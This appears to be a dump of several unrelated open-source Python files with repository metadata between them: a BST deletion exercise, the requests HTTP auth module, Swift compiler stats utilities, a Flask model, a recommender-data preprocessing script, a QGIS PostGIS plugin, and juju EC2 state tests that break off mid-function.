# / \
# 3 6
# / \ \
# 2 4 7
# Given key to delete is 3. So we find the node with value 3 and delete it.
# One valid answer is [5,4,6,2,null,null,7], shown in the following BST.
# 5
# / \
# 4 6
# / \
# 2 7
# Another valid answer is [5,2,6,null,4,null,7].
# 5
# / \
# 2 6
# \ \
# 4 7
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
from tree import *
class Solution:
def deleteNode(self, root: TreeNode, key: int) -> TreeNode:
if root == None:
return None
if key < root.val:
root.left = self.deleteNode(root.left, key)
elif key > root.val:
root.right = self.deleteNode(root.right, key)
else:
node = root
if node.left == None:
return node.right
root = self.getmax(node.left)
# print(f'find new root: {root.val}')
root.left = self.deletemax(node.left)
root.right = node.right
return root
def getmax(self, root):
if root == None or root.right == None:
return root
return getmax(root.right)
def deletemax(self, root):
if root == None:
return None
if root.right == None:
return root.left
root.right = deletemax(root.right)
return root
nodeString = '[5,3,6,2,4,null,7]'
sol = Solution()
root = treeBuilder(nodeString)
print('lala')
traverse(sol.deleteNode(root, 3))
|
eroicaleo/LearningPython
|
interview/leet/450_Delete_Node_in_a_BST.py
|
Python
|
mit
| 2,059 | 0.004371 |
# -*- coding: utf-8 -*-
"""
requests.auth
~~~~~~~~~~~~~
This module contains the authentication handlers for Requests.
"""
import os
import re
import time
import hashlib
from base64 import b64encode
from .compat import urlparse, str
from .cookies import extract_cookies_to_jar
from .utils import parse_dict_header
CONTENT_TYPE_FORM_URLENCODED = 'application/x-www-form-urlencoded'
CONTENT_TYPE_MULTI_PART = 'multipart/form-data'
def _basic_auth_str(username, password):
"""Returns a Basic Auth string."""
return 'Basic ' + b64encode(('%s:%s' % (username, password)).encode('latin1')).strip().decode('latin1')
class AuthBase(object):
"""Base class that all auth implementations derive from"""
def __call__(self, r):
raise NotImplementedError('Auth hooks must be callable.')
class HTTPBasicAuth(AuthBase):
"""Attaches HTTP Basic Authentication to the given Request object."""
def __init__(self, username, password):
self.username = username
self.password = password
def __call__(self, r):
r.headers['Authorization'] = _basic_auth_str(self.username, self.password)
return r
class HTTPProxyAuth(HTTPBasicAuth):
"""Attaches HTTP Proxy Authentication to a given Request object."""
def __call__(self, r):
r.headers['Proxy-Authorization'] = _basic_auth_str(self.username, self.password)
return r
class HTTPDigestAuth(AuthBase):
"""Attaches HTTP Digest Authentication to the given Request object."""
def __init__(self, username, password):
self.username = username
self.password = password
self.last_nonce = ''
self.nonce_count = 0
self.chal = {}
self.pos = None
def build_digest_header(self, method, url):
realm = self.chal['realm']
nonce = self.chal['nonce']
qop = self.chal.get('qop')
algorithm = self.chal.get('algorithm')
opaque = self.chal.get('opaque')
if algorithm is None:
_algorithm = 'MD5'
else:
_algorithm = algorithm.upper()
# lambdas assume digest modules are imported at the top level
if _algorithm == 'MD5' or _algorithm == 'MD5-SESS':
def md5_utf8(x):
if isinstance(x, str):
x = x.encode('utf-8')
return hashlib.md5(x).hexdigest()
hash_utf8 = md5_utf8
elif _algorithm == 'SHA':
def sha_utf8(x):
if isinstance(x, str):
x = x.encode('utf-8')
return hashlib.sha1(x).hexdigest()
hash_utf8 = sha_utf8
KD = lambda s, d: hash_utf8("%s:%s" % (s, d))
if hash_utf8 is None:
return None
# XXX not implemented yet
entdig = None
p_parsed = urlparse(url)
path = p_parsed.path
if p_parsed.query:
path += '?' + p_parsed.query
A1 = '%s:%s:%s' % (self.username, realm, self.password)
A2 = '%s:%s' % (method, path)
HA1 = hash_utf8(A1)
HA2 = hash_utf8(A2)
if nonce == self.last_nonce:
self.nonce_count += 1
else:
self.nonce_count = 1
ncvalue = '%08x' % self.nonce_count
s = str(self.nonce_count).encode('utf-8')
s += nonce.encode('utf-8')
s += time.ctime().encode('utf-8')
s += os.urandom(8)
cnonce = (hashlib.sha1(s).hexdigest()[:16])
noncebit = "%s:%s:%s:%s:%s" % (nonce, ncvalue, cnonce, qop, HA2)
if _algorithm == 'MD5-SESS':
HA1 = hash_utf8('%s:%s:%s' % (HA1, nonce, cnonce))
if qop is None:
respdig = KD(HA1, "%s:%s" % (nonce, HA2))
elif qop == 'auth' or 'auth' in qop.split(','):
respdig = KD(HA1, noncebit)
else:
# XXX handle auth-int.
return None
self.last_nonce = nonce
# XXX should the partial digests be encoded too?
base = 'username="%s", realm="%s", nonce="%s", uri="%s", ' \
'response="%s"' % (self.username, realm, nonce, path, respdig)
if opaque:
base += ', opaque="%s"' % opaque
if algorithm:
base += ', algorithm="%s"' % algorithm
if entdig:
base += ', digest="%s"' % entdig
if qop:
base += ', qop="auth", nc=%s, cnonce="%s"' % (ncvalue, cnonce)
return 'Digest %s' % (base)
def handle_401(self, r, **kwargs):
"""Takes the given response and tries digest-auth, if needed."""
if self.pos is not None:
# Rewind the file position indicator of the body to where
# it was to resend the request.
r.request.body.seek(self.pos)
num_401_calls = getattr(self, 'num_401_calls', 1)
s_auth = r.headers.get('www-get_token', '')
if 'digest' in s_auth.lower() and num_401_calls < 2:
setattr(self, 'num_401_calls', num_401_calls + 1)
pat = re.compile(r'digest ', flags=re.IGNORECASE)
self.chal = parse_dict_header(pat.sub('', s_auth, count=1))
# Consume content and release the original connection
# to allow our new request to reuse the same one.
r.content
r.raw.release_conn()
prep = r.request.copy()
extract_cookies_to_jar(prep._cookies, r.request, r.raw)
prep.prepare_cookies(prep._cookies)
prep.headers['Authorization'] = self.build_digest_header(
prep.method, prep.url)
_r = r.connection.send(prep, **kwargs)
_r.history.append(r)
_r.request = prep
return _r
setattr(self, 'num_401_calls', 1)
return r
def __call__(self, r):
# If we have a saved nonce, skip the 401
if self.last_nonce:
r.headers['Authorization'] = self.build_digest_header(r.method, r.url)
try:
self.pos = r.body.tell()
except AttributeError:
pass
r.register_hook('response', self.handle_401)
return r
|
Botong/songtaste
|
lib/requests/auth.py
|
Python
|
apache-2.0
| 6,120 | 0.000817 |
#!/usr/bin/python
#
# ==-- jobstats - support for reading the contents of stats dirs --==#
#
# This source file is part of the Swift.org open source project
#
# Copyright (c) 2014-2017 Apple Inc. and the Swift project authors
# Licensed under Apache License v2.0 with Runtime Library Exception
#
# See https://swift.org/LICENSE.txt for license information
# See https://swift.org/CONTRIBUTORS.txt for the list of Swift project authors
#
# ==------------------------------------------------------------------------==#
#
# This file contains subroutines for loading object-representations of one or
# more directories generated by `swiftc -stats-output-dir`.
import datetime
import itertools
import json
import os
import random
import re
class JobStats(object):
"""Object holding the stats of a single job run during a compilation,
corresponding to a single JSON file produced by a single job process
passed -stats-output-dir."""
def __init__(self, jobkind, jobid, module, start_usec, dur_usec,
jobargs, stats):
self.jobkind = jobkind
self.jobid = jobid
self.module = module
self.start_usec = start_usec
self.dur_usec = dur_usec
self.jobargs = jobargs
self.stats = stats
def is_driver_job(self):
"""Return true iff self measures a driver job"""
return self.jobkind == 'driver'
def is_frontend_job(self):
"""Return true iff self measures a frontend job"""
return self.jobkind == 'frontend'
def driver_jobs_ran(self):
"""Return the count of a driver job's ran sub-jobs"""
assert(self.is_driver_job())
return self.stats.get("Driver.NumDriverJobsRun", 0)
def driver_jobs_skipped(self):
"""Return the count of a driver job's skipped sub-jobs"""
assert(self.is_driver_job())
return self.stats.get("Driver.NumDriverJobsSkipped", 0)
def driver_jobs_total(self):
"""Return the total count of a driver job's ran + skipped sub-jobs"""
assert(self.is_driver_job())
return self.driver_jobs_ran() + self.driver_jobs_skipped()
def merged_with(self, other, merge_by="sum"):
"""Return a new JobStats, holding the merger of self and other"""
merged_stats = {}
ops = {"sum": lambda a, b: a + b,
# Because 0 is also a sentinel on counters we do a modified
# "nonzero-min" here. Not ideal but best we can do.
"min": lambda a, b: (min(a, b)
if a != 0 and b != 0
else max(a, b)),
"max": lambda a, b: max(a, b)}
op = ops[merge_by]
for k, v in self.stats.items() + other.stats.items():
if k in merged_stats:
merged_stats[k] = op(v, merged_stats[k])
else:
merged_stats[k] = v
merged_kind = self.jobkind
if other.jobkind != merged_kind:
merged_kind = "<merged>"
merged_module = self.module
if other.module != merged_module:
merged_module = "<merged>"
merged_start = min(self.start_usec, other.start_usec)
merged_end = max(self.start_usec + self.dur_usec,
other.start_usec + other.dur_usec)
merged_dur = merged_end - merged_start
return JobStats(merged_kind, random.randint(0, 1000000000),
merged_module, merged_start, merged_dur,
self.jobargs + other.jobargs, merged_stats)
def prefixed_by(self, prefix):
prefixed_stats = dict([((prefix + "." + k), v)
for (k, v) in self.stats.items()])
return JobStats(self.jobkind, random.randint(0, 1000000000),
self.module, self.start_usec, self.dur_usec,
self.jobargs, prefixed_stats)
def divided_by(self, n):
divided_stats = dict([(k, v / n)
for (k, v) in self.stats.items()])
return JobStats(self.jobkind, random.randint(0, 1000000000),
self.module, self.start_usec, self.dur_usec,
self.jobargs, divided_stats)
def incrementality_percentage(self):
"""Assuming the job is a driver job, return the amount of
jobs that actually ran, as a percentage of the total number."""
assert(self.is_driver_job())
ran = self.driver_jobs_ran()
total = self.driver_jobs_total()
return round((float(ran) / float(total)) * 100.0, 2)
def to_catapult_trace_obj(self):
"""Return a JSON-formattable object fitting chrome's
'catapult' trace format"""
return {"name": self.module,
"cat": self.jobkind,
"ph": "X", # "X" == "complete event"
"pid": self.jobid,
"tid": 1,
"ts": self.start_usec,
"dur": self.dur_usec,
"args": self.jobargs}
def start_timestr(self):
"""Return a formatted timestamp of the job's start-time"""
t = datetime.datetime.fromtimestamp(self.start_usec / 1000000.0)
return t.strftime("%Y-%m-%d %H:%M:%S")
def end_timestr(self):
"""Return a formatted timestamp of the job's end-time"""
t = datetime.datetime.fromtimestamp((self.start_usec +
self.dur_usec) / 1000000.0)
return t.strftime("%Y-%m-%d %H:%M:%S")
def pick_lnt_metric_suffix(self, metric_name):
"""Guess an appropriate LNT metric type for a given metric name"""
if "BytesOutput" in metric_name:
return "code_size"
if "RSS" in metric_name or "BytesAllocated" in metric_name:
return "mem"
return "compile"
def to_lnt_test_obj(self, args):
"""Return a JSON-formattable object fitting LNT's 'submit' format"""
run_info = {
"run_order": str(args.lnt_order),
"tag": str(args.lnt_tag),
}
run_info.update(dict(args.lnt_run_info))
stats = self.stats
return {
"Machine":
{
"Name": args.lnt_machine,
"Info": dict(args.lnt_machine_info)
},
"Run":
{
"Start Time": self.start_timestr(),
"End Time": self.end_timestr(),
"Info": run_info
},
"Tests":
[
{
"Data": [v],
"Info": {},
"Name": "%s.%s.%s.%s" % (args.lnt_tag, self.module,
k, self.pick_lnt_metric_suffix(k))
}
for (k, v) in stats.items()
]
}
AUXPATSTR = (r"(?P<module>[^-]+)-(?P<input>[^-]+)-(?P<triple>[^-]+)" +
r"-(?P<out>[^-]*)-(?P<opt>[^-]+)")
AUXPAT = re.compile(AUXPATSTR)
TIMERPATSTR = (r"time\.swift-(?P<jobkind>\w+)\." + AUXPATSTR +
"\.(?P<timerkind>\w+)$")
TIMERPAT = re.compile(TIMERPATSTR)
FILEPATSTR = (r"^stats-(?P<start>\d+)-swift-(?P<kind>\w+)-" +
AUXPATSTR +
r"-(?P<pid>\d+)(-.*)?.json$")
FILEPAT = re.compile(FILEPATSTR)
def match_auxpat(s):
m = AUXPAT.match(s)
if m is not None:
return m.groupdict()
else:
return None
def match_timerpat(s):
m = TIMERPAT.match(s)
if m is not None:
return m.groupdict()
else:
return None
def match_filepat(s):
m = FILEPAT.match(s)
if m is not None:
return m.groupdict()
else:
return None
def load_stats_dir(path, select_module=[], select_stat=[],
exclude_timers=False, merge_timers=False, **kwargs):
"""Loads all stats-files found in path into a list of JobStats objects"""
jobstats = []
sre = re.compile('.*' if len(select_stat) == 0 else
'|'.join(select_stat))
for root, dirs, files in os.walk(path):
for f in files:
mg = match_filepat(f)
if not mg:
continue
# NB: "pid" in fpat is a random number, not unix pid.
jobkind = mg['kind']
jobid = int(mg['pid'])
start_usec = int(mg['start'])
module = mg["module"]
if len(select_module) != 0 and module not in select_module:
continue
jobargs = [mg["input"], mg["triple"], mg["out"], mg["opt"]]
with open(os.path.join(root, f)) as fp:
j = json.load(fp)
dur_usec = 1
stats = dict()
for (k, v) in j.items():
if sre.search(k) is None:
continue
if k.startswith('time.') and exclude_timers:
continue
tm = match_timerpat(k)
if tm:
v = int(1000000.0 * float(v))
if tm['jobkind'] == jobkind and \
tm['timerkind'] == 'wall':
dur_usec = v
if merge_timers:
k = "time.swift-%s.%s" % (tm['jobkind'],
tm['timerkind'])
stats[k] = v
e = JobStats(jobkind=jobkind, jobid=jobid,
module=module, start_usec=start_usec,
dur_usec=dur_usec, jobargs=jobargs,
stats=stats)
jobstats.append(e)
return jobstats
def merge_all_jobstats(jobstats, select_module=[], group_by_module=False,
merge_by="sum", divide_by=1, **kwargs):
"""Does a pairwise merge of the elements of list of jobs"""
m = None
if len(select_module) > 0:
jobstats = filter(lambda j: j.module in select_module, jobstats)
if group_by_module:
def keyfunc(j):
return j.module
jobstats = list(jobstats)
jobstats.sort(key=keyfunc)
prefixed = []
for mod, group in itertools.groupby(jobstats, keyfunc):
groupmerge = merge_all_jobstats(group, merge_by=merge_by,
divide_by=divide_by)
prefixed.append(groupmerge.prefixed_by(mod))
jobstats = prefixed
for j in jobstats:
if m is None:
m = j
else:
m = m.merged_with(j, merge_by=merge_by)
if m is None:
return m
return m.divided_by(divide_by)
|
zisko/swift
|
utils/jobstats/jobstats.py
|
Python
|
apache-2.0
| 10,591 | 0.000189 |
from models import db
from models.Post import Post
class PostFile(db.Model):
__tablename__ = 'PostFile'
Id = db.Column(db.Integer, primary_key = True)
Post = db.Column(db.Integer, db.ForeignKey(Post.Id))
FileName = db.Column(db.String(128))
def __init__(self, post, file):
self.Post = post
self.FileName = file
|
goors/flask-microblog
|
models/PostFile.py
|
Python
|
apache-2.0
| 335 | 0.026866 |
# -*- coding: utf-8 -*-
"""
Created on Fri Jun 25 16:20:12 2015
@author: Balázs Hidasi
@lastmodified: Loreto Parisi (loretoparisi at gmail dot com)
"""
import sys
import os
import numpy as np
import pandas as pd
import datetime as dt
# To redirect output to file
class Logger(object):
def __init__(self, filename="Default.log"):
self.terminal = sys.stdout
self.log = open(filename, "a")
def write(self, message):
self.terminal.write(message)
self.log.write(message)
def flush(self):
pass
sys.stdout = Logger( os.environ['HOME' ] + '/theano.log' )
PATH_TO_ORIGINAL_DATA = os.environ['HOME'] + '/'
PATH_TO_PROCESSED_DATA = os.environ['HOME'] + '/'
data = pd.read_csv(PATH_TO_ORIGINAL_DATA + 'yoochoose-clicks.dat', sep=',', header=None, usecols=[0,1,2], dtype={0:np.int32, 1:str, 2:np.int64})
data.columns = ['SessionId', 'TimeStr', 'ItemId']
data['Time'] = data.TimeStr.apply(lambda x: dt.datetime.strptime(x, '%Y-%m-%dT%H:%M:%S.%fZ').timestamp()) #This is not UTC. It does not really matter.
del(data['TimeStr'])
session_lengths = data.groupby('SessionId').size()
data = data[np.in1d(data.SessionId, session_lengths[session_lengths>1].index)]
item_supports = data.groupby('ItemId').size()
data = data[np.in1d(data.ItemId, item_supports[item_supports>=5].index)]
session_lengths = data.groupby('SessionId').size()
data = data[np.in1d(data.SessionId, session_lengths[session_lengths>=2].index)]
tmax = data.Time.max()
session_max_times = data.groupby('SessionId').Time.max()
session_train = session_max_times[session_max_times < tmax-86400].index
session_test = session_max_times[session_max_times >= tmax-86400].index
train = data[np.in1d(data.SessionId, session_train)]
test = data[np.in1d(data.SessionId, session_test)]
test = test[np.in1d(test.ItemId, train.ItemId)]
tslength = test.groupby('SessionId').size()
test = test[np.in1d(test.SessionId, tslength[tslength>=2].index)]
print('Full train set\n\tEvents: {}\n\tSessions: {}\n\tItems: {}'.format(len(train), train.SessionId.nunique(), train.ItemId.nunique()))
train.to_csv(PATH_TO_PROCESSED_DATA + 'rsc15_train_full.txt', sep='\t', index=False)
print('Test set\n\tEvents: {}\n\tSessions: {}\n\tItems: {}'.format(len(test), test.SessionId.nunique(), test.ItemId.nunique()))
test.to_csv(PATH_TO_PROCESSED_DATA + 'rsc15_test.txt', sep='\t', index=False)
tmax = train.Time.max()
session_max_times = train.groupby('SessionId').Time.max()
session_train = session_max_times[session_max_times < tmax-86400].index
session_valid = session_max_times[session_max_times >= tmax-86400].index
train_tr = train[np.in1d(train.SessionId, session_train)]
valid = train[np.in1d(train.SessionId, session_valid)]
valid = valid[np.in1d(valid.ItemId, train_tr.ItemId)]
tslength = valid.groupby('SessionId').size()
valid = valid[np.in1d(valid.SessionId, tslength[tslength>=2].index)]
print('Train set\n\tEvents: {}\n\tSessions: {}\n\tItems: {}'.format(len(train_tr), train_tr.SessionId.nunique(), train_tr.ItemId.nunique()))
train_tr.to_csv(PATH_TO_PROCESSED_DATA + 'rsc15_train_tr.txt', sep='\t', index=False)
print('Validation set\n\tEvents: {}\n\tSessions: {}\n\tItems: {}'.format(len(valid), valid.SessionId.nunique(), valid.ItemId.nunique()))
valid.to_csv(PATH_TO_PROCESSED_DATA + 'rsc15_train_valid.txt', sep='\t', index=False)
|
loretoparisi/docker
|
theano/rsc15/preprocess.py
|
Python
|
mit
| 3,325 | 0.008724 |
a = [1 2 3]
|
smmribeiro/intellij-community
|
python/testData/psi/MissingListSeparators.py
|
Python
|
apache-2.0
| 11 | 0.090909 |
# -*- coding: utf-8 -*-
"""
/***************************************************************************
Name : DB Manager
Description : Database manager plugin for QGIS
Date : May 23, 2011
copyright : (C) 2011 by Giuseppe Sucameli
email : brush.tyler@gmail.com
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
from builtins import str
from builtins import map
from builtins import range
# this will disable the dbplugin if the connector raise an ImportError
from .connector import PostGisDBConnector
from qgis.PyQt.QtCore import QSettings, Qt, QRegExp
from qgis.PyQt.QtGui import QIcon
from qgis.PyQt.QtWidgets import QAction, QApplication, QMessageBox
from qgis.gui import QgsMessageBar
from ..plugin import ConnectionError, InvalidDataException, DBPlugin, Database, Schema, Table, VectorTable, RasterTable, \
TableField, TableConstraint, TableIndex, TableTrigger, TableRule
import re
from . import resources_rc # NOQA
def classFactory():
return PostGisDBPlugin
class PostGisDBPlugin(DBPlugin):
@classmethod
def icon(self):
return QIcon(":/db_manager/postgis/icon")
@classmethod
def typeName(self):
return 'postgis'
@classmethod
def typeNameString(self):
return 'PostGIS'
@classmethod
def providerName(self):
return 'postgres'
@classmethod
def connectionSettingsKey(self):
return '/PostgreSQL/connections'
def databasesFactory(self, connection, uri):
return PGDatabase(connection, uri)
def connect(self, parent=None):
conn_name = self.connectionName()
settings = QSettings()
settings.beginGroup(u"/%s/%s" % (self.connectionSettingsKey(), conn_name))
if not settings.contains("database"): # non-existent entry?
raise InvalidDataException(self.tr('There is no defined database connection "%s".') % conn_name)
from qgis.core import QgsDataSourceUri
uri = QgsDataSourceUri()
settingsList = ["service", "host", "port", "database", "username", "password", "authcfg"]
service, host, port, database, username, password, authcfg = [settings.value(x, "", type=str) for x in settingsList]
useEstimatedMetadata = settings.value("estimatedMetadata", False, type=bool)
sslmode = settings.value("sslmode", QgsDataSourceUri.SslPrefer, type=int)
settings.endGroup()
if hasattr(authcfg, 'isNull') and authcfg.isNull():
authcfg = ''
if service:
uri.setConnection(service, database, username, password, sslmode, authcfg)
else:
uri.setConnection(host, port, database, username, password, sslmode, authcfg)
uri.setUseEstimatedMetadata(useEstimatedMetadata)
try:
return self.connectToUri(uri)
except ConnectionError:
return False
class PGDatabase(Database):
def __init__(self, connection, uri):
Database.__init__(self, connection, uri)
def connectorsFactory(self, uri):
return PostGisDBConnector(uri)
def dataTablesFactory(self, row, db, schema=None):
return PGTable(row, db, schema)
def info(self):
from .info_model import PGDatabaseInfo
return PGDatabaseInfo(self)
def vectorTablesFactory(self, row, db, schema=None):
return PGVectorTable(row, db, schema)
def rasterTablesFactory(self, row, db, schema=None):
return PGRasterTable(row, db, schema)
def schemasFactory(self, row, db):
return PGSchema(row, db)
def sqlResultModel(self, sql, parent):
from .data_model import PGSqlResultModel
return PGSqlResultModel(self, sql, parent)
def registerDatabaseActions(self, mainWindow):
Database.registerDatabaseActions(self, mainWindow)
# add a separator
separator = QAction(self)
separator.setSeparator(True)
mainWindow.registerAction(separator, self.tr("&Table"))
action = QAction(self.tr("Run &Vacuum Analyze"), self)
mainWindow.registerAction(action, self.tr("&Table"), self.runVacuumAnalyzeActionSlot)
action = QAction(self.tr("Run &Refresh Materialized View"), self)
mainWindow.registerAction(action, self.tr("&Table"), self.runRefreshMaterializedViewSlot)
def runVacuumAnalyzeActionSlot(self, item, action, parent):
QApplication.restoreOverrideCursor()
try:
if not isinstance(item, Table) or item.isView:
parent.infoBar.pushMessage(self.tr("Select a table for vacuum analyze."), QgsMessageBar.INFO,
parent.iface.messageTimeout())
return
finally:
QApplication.setOverrideCursor(Qt.WaitCursor)
item.runVacuumAnalyze()
def runRefreshMaterializedViewSlot(self, item, action, parent):
QApplication.restoreOverrideCursor()
try:
if not isinstance(item, PGTable) or item._relationType != 'm':
parent.infoBar.pushMessage(self.tr("Select a materialized view for refresh."), QgsMessageBar.INFO,
parent.iface.messageTimeout())
return
finally:
QApplication.setOverrideCursor(Qt.WaitCursor)
item.runRefreshMaterializedView()
def hasLowercaseFieldNamesOption(self):
return True
class PGSchema(Schema):
def __init__(self, row, db):
Schema.__init__(self, db)
self.oid, self.name, self.owner, self.perms, self.comment = row
class PGTable(Table):
def __init__(self, row, db, schema=None):
Table.__init__(self, db, schema)
self.name, schema_name, self._relationType, self.owner, self.estimatedRowCount, self.pages, self.comment = row
self.isView = self._relationType in set(['v', 'm'])
self.estimatedRowCount = int(self.estimatedRowCount)
def runVacuumAnalyze(self):
self.aboutToChange.emit()
self.database().connector.runVacuumAnalyze((self.schemaName(), self.name))
# TODO: change only this item, not re-create all the tables in the schema/database
self.schema().refresh() if self.schema() else self.database().refresh()
def runRefreshMaterializedView(self):
self.aboutToChange.emit()
self.database().connector.runRefreshMaterializedView((self.schemaName(), self.name))
# TODO: change only this item, not re-create all the tables in the schema/database
self.schema().refresh() if self.schema() else self.database().refresh()
def runAction(self, action):
action = str(action)
if action.startswith("vacuumanalyze/"):
if action == "vacuumanalyze/run":
self.runVacuumAnalyze()
return True
elif action.startswith("rule/"):
parts = action.split('/')
rule_name = parts[1]
rule_action = parts[2]
msg = u"Do you want to %s rule %s?" % (rule_action, rule_name)
QApplication.restoreOverrideCursor()
try:
if QMessageBox.question(None, self.tr("Table rule"), msg,
QMessageBox.Yes | QMessageBox.No) == QMessageBox.No:
return False
finally:
QApplication.setOverrideCursor(Qt.WaitCursor)
if rule_action == "delete":
self.aboutToChange.emit()
self.database().connector.deleteTableRule(rule_name, (self.schemaName(), self.name))
self.refreshRules()
return True
elif action.startswith("refreshmaterializedview/"):
if action == "refreshmaterializedview/run":
self.runRefreshMaterializedView()
return True
return Table.runAction(self, action)
def tableFieldsFactory(self, row, table):
return PGTableField(row, table)
def tableConstraintsFactory(self, row, table):
return PGTableConstraint(row, table)
def tableIndexesFactory(self, row, table):
return PGTableIndex(row, table)
def tableTriggersFactory(self, row, table):
return PGTableTrigger(row, table)
def tableRulesFactory(self, row, table):
return PGTableRule(row, table)
def info(self):
from .info_model import PGTableInfo
return PGTableInfo(self)
def tableDataModel(self, parent):
from .data_model import PGTableDataModel
return PGTableDataModel(self, parent)
def delete(self):
self.aboutToChange.emit()
if self.isView:
ret = self.database().connector.deleteView((self.schemaName(), self.name), self._relationType == 'm')
else:
ret = self.database().connector.deleteTable((self.schemaName(), self.name))
if not ret:
self.deleted.emit()
return ret
class PGVectorTable(PGTable, VectorTable):
def __init__(self, row, db, schema=None):
PGTable.__init__(self, row[:-4], db, schema)
VectorTable.__init__(self, db, schema)
self.geomColumn, self.geomType, self.geomDim, self.srid = row[-4:]
def info(self):
from .info_model import PGVectorTableInfo
return PGVectorTableInfo(self)
def runAction(self, action):
if PGTable.runAction(self, action):
return True
return VectorTable.runAction(self, action)
class PGRasterTable(PGTable, RasterTable):
def __init__(self, row, db, schema=None):
PGTable.__init__(self, row[:-6], db, schema)
RasterTable.__init__(self, db, schema)
self.geomColumn, self.pixelType, self.pixelSizeX, self.pixelSizeY, self.isExternal, self.srid = row[-6:]
self.geomType = 'RASTER'
def info(self):
from .info_model import PGRasterTableInfo
return PGRasterTableInfo(self)
def gdalUri(self, uri=None):
if not uri:
uri = self.database().uri()
schema = (u'schema=%s' % self.schemaName()) if self.schemaName() else ''
dbname = (u'dbname=%s' % uri.database()) if uri.database() else ''
host = (u'host=%s' % uri.host()) if uri.host() else ''
user = (u'user=%s' % uri.username()) if uri.username() else ''
passw = (u'password=%s' % uri.password()) if uri.password() else ''
port = (u'port=%s' % uri.port()) if uri.port() else ''
# Find first raster field
col = ''
for fld in self.fields():
if fld.dataType == "raster":
col = u'column=%s' % fld.name
break
gdalUri = u'PG: %s %s %s %s %s mode=2 %s %s table=%s' % \
(dbname, host, user, passw, port, schema, col, self.name)
return gdalUri
def mimeUri(self):
# QGIS has no provider for PGRasters, let's use GDAL
uri = u"raster:gdal:%s:%s" % (self.name, re.sub(":", "\:", self.gdalUri()))
return uri
def toMapLayer(self):
from qgis.core import QgsRasterLayer, QgsContrastEnhancement, QgsDataSourceUri, QgsCredentials
rl = QgsRasterLayer(self.gdalUri(), self.name)
if not rl.isValid():
err = rl.error().summary()
uri = QgsDataSourceUri(self.database().uri())
conninfo = uri.connectionInfo(False)
username = uri.username()
password = uri.password()
for i in range(3):
(ok, username, password) = QgsCredentials.instance().get(conninfo, username, password, err)
if ok:
uri.setUsername(username)
uri.setPassword(password)
rl = QgsRasterLayer(self.gdalUri(uri), self.name)
if rl.isValid():
break
if rl.isValid():
rl.setContrastEnhancement(QgsContrastEnhancement.StretchToMinimumMaximum)
return rl
class PGTableField(TableField):
def __init__(self, row, table):
TableField.__init__(self, table)
self.num, self.name, self.dataType, self.charMaxLen, self.modifier, self.notNull, self.hasDefault, self.default, typeStr = row
self.primaryKey = False
# get modifier (e.g. "precision,scale") from formatted type string
trimmedTypeStr = typeStr.strip()
regex = QRegExp("\((.+)\)$")
startpos = regex.indexIn(trimmedTypeStr)
if startpos >= 0:
self.modifier = regex.cap(1).strip()
else:
self.modifier = None
# find out whether fields are part of primary key
for con in self.table().constraints():
if con.type == TableConstraint.TypePrimaryKey and self.num in con.columns:
self.primaryKey = True
break
class PGTableConstraint(TableConstraint):
def __init__(self, row, table):
TableConstraint.__init__(self, table)
self.name, constr_type_str, self.isDefferable, self.isDeffered, columns = row[:5]
self.columns = list(map(int, columns.split(' ')))
if constr_type_str in TableConstraint.types:
self.type = TableConstraint.types[constr_type_str]
else:
self.type = TableConstraint.TypeUnknown
if self.type == TableConstraint.TypeCheck:
self.checkSource = row[5]
elif self.type == TableConstraint.TypeForeignKey:
self.foreignTable = row[6]
self.foreignOnUpdate = TableConstraint.onAction[row[7]]
self.foreignOnDelete = TableConstraint.onAction[row[8]]
self.foreignMatchType = TableConstraint.matchTypes[row[9]]
self.foreignKeys = row[10]
class PGTableIndex(TableIndex):
def __init__(self, row, table):
TableIndex.__init__(self, table)
self.name, columns, self.isUnique = row
self.columns = list(map(int, columns.split(' ')))
class PGTableTrigger(TableTrigger):
def __init__(self, row, table):
TableTrigger.__init__(self, table)
self.name, self.function, self.type, self.enabled = row
class PGTableRule(TableRule):
def __init__(self, row, table):
TableRule.__init__(self, table)
self.name, self.definition = row
|
drnextgis/QGIS
|
python/plugins/db_manager/db_plugins/postgis/plugin.py
|
Python
|
gpl-2.0
| 14,923 | 0.002278 |
from yaml import dump
from twisted.internet.defer import succeed, fail
from txaws.s3.exception import S3Error
from juju.lib.testing import TestCase
from juju.providers.ec2.tests.common import EC2TestMixin
class EC2StateTest(TestCase, EC2TestMixin):
def setUp(self):
EC2TestMixin.setUp(self)
super(EC2StateTest, self).setUp()
def test_save(self):
"""
When passed some juju ec2 machine instances and asked to save,
the machine, it will serialize the data to an s3 bucket.
"""
instances = [self.get_instance("i-foobar", dns_name="x1.example.com")]
state = dump(
{"zookeeper-instances":
[[i.instance_id, i.dns_name] for i in instances]})
self.s3.put_object(
self.env_name, "provider-state", state),
self.mocker.result(succeed(state))
self.mocker.replay()
provider = self.get_provider()
d = provider.save_state(
{"zookeeper-instances":
[[i.instance_id, i.dns_name] for i in instances]})
def assert_state(saved_state):
self.assertEqual(saved_state, state)
d.addCallback(assert_state)
return d
def test_save_non_existant_bucket(self):
"""
When saving instance information to S3 the EC2 provider will create a
namespaced bucket specific to the provider instance, if it does not
already exist.
"""
instances = [self.get_instance("i-foobar", dns_name="x1.example.com")]
state = dump(
{"zookeeper-instances":
[[i.instance_id, i.dns_name] for i in instances]})
self.s3.put_object(
self.env_name, "provider-state", state),
error = S3Error("<error/>", 404)
error.errors = [{"Code": "NoSuchBucket"}]
self.mocker.result(fail(error))
self.s3.create_bucket(self.env_name)
self.mocker.result(succeed({}))
self.s3.put_object(
self.env_name, "provider-state", state),
self.mocker.result(succeed(state))
self.mocker.replay()
provider = self.get_provider()
d = provider.save_state(
{"zookeeper-instances":
[[i.instance_id, i.dns_name] for i in instances]})
def assert_state(saved_state):
self.assertEqual(saved_state, state)
d.addCallback(assert_state)
return d
def test_load(self):
"""
The provider bootstrap will load and deserialize any saved state from
s3.
"""
self.s3.get_object(self.env_name, "provider-state")
self.mocker.result(succeed(dump({"zookeeper-instances": []})))
self.mocker.replay()
provider = self.get_provider()
d = provider.load_state()
def assert_load_value(value):
self.assertEqual(value, {"zookeeper-instances": []})
d.addCallback(assert_load_value)
return d
def test_load_nonexistant_bucket(self):
"""
When loading saved state from s3, the system returns False if the
s3 control bucket does not exist.
"""
self.s3.get_object(self.env_name, "provider-state")
